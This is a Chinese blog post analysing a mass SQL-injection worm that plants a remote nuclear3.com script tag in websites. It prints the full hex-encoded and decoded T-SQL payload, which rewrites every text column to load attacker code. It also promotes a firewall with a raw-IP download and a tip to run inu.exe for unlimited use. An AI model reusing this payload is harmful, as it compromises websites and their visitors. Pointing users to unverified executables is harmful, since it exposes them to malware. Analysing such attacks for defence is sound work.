c.nuclear3.c%6F%6D/css/c.js挂马完美解决方案

b3b69c9c-e9b3-4abd-9af0-46faed2fa803

# 鬼仔:帮Safe3 AD下。

最近挂马闹得异常的凶,黑客商业化挂马越来越普遍,用GOOGLE搜索下:/css/c.js></Script>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵, 约有498,000项,上万个网站被挂马。

木马地址不断变形<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>,但总是http://c.nuclear3.com/这段在不断变化,变种有

<Script Src=http://c.nu%63lear3.com/css/c.js></Script

<Script Src=http://c.nuclear3%2E%63om/css/c.js></Script

<Script Src=http://%63.nuclear3.com/css/c.js></Script

等等。

最终经过安全伞终于抓到木马原型如下:

;DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt

(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C004000

4300200056006100720063006800610072002800320035003500290020004400650063006C00610072006500200054006100620

06C0065005F0043007500720073006F007200200043007500720073006F007200200046006F0072002000530065006C00650063

007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F006

2006A006500630074007300200041002C0053007900730063006F006C0075006D006E0073002000420020005700680065007200

6500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D002700750

02700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E005800740079

00700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002

E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F00430075007200

73006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C00650

05F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040

004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E002000450078006

50063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B002700

2B00400043002B0027005D003D0052007400720069006D00280043006F006E00760065007200740028005600610072006300680

0610072002800380030003000300029002C005B0027002B00400043002B0027005D00290029002B00270027003C005300630072

0069007000740020005300720063003D0068007400740070003A002F002F0063002E006E00750063006C0065006100720033002

E0063002500360046002500360044002F006300730073002F0063002E006A0073003E003C002F00530063007200690070007400

3E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0

065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C

006F007300650020005400610062006C0065005F0043007500720073006F00720020004400650061006C006C006F00630061007

400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);–

该木马通过Cookie注入挂马,使用搜索引擎自动查找并注入网站,有点蠕虫的性质。

上面cast里面sql语句解密如下

Declare @T Varchar(255),@C Varchar(255)

Declare Table_Cursor Cursor For Select A.Name,B.Name From Sysobjects A,Syscolumns B Where A.Id=B.Id And

A.Xtype=’u’ And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)

Open Table_Cursor Fetch Next From Table_Cursor Into @T,@C While(@@Fetch_Status=0)

Begin
Exec(‘update [‘+@T+’] Set [‘+@C+’]=Rtrim(Convert(Varchar(8000),[‘+@C+’]))+”<Script

Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>”’)Fetch Next From Table_Cursor Into @T,@C
End

Close Table_Cursor

Deallocate Table_Cursor

安全伞2009企业版可以有效解决类似变相注入问题

官方下载:http://121.207.254.246/safe3.rar

小提示:该软件是收费的,但为了广大用户免受其害,可以下载后直接运行安全伞目录下的inu.exe,防火墙则被安装并且无限制使用。要使用其它功能最好还是购买下,希望大家支持本软件。

相关日志

楼被抢了 4 层了... 抢座Rss 2.0或者 Trackback

发表评论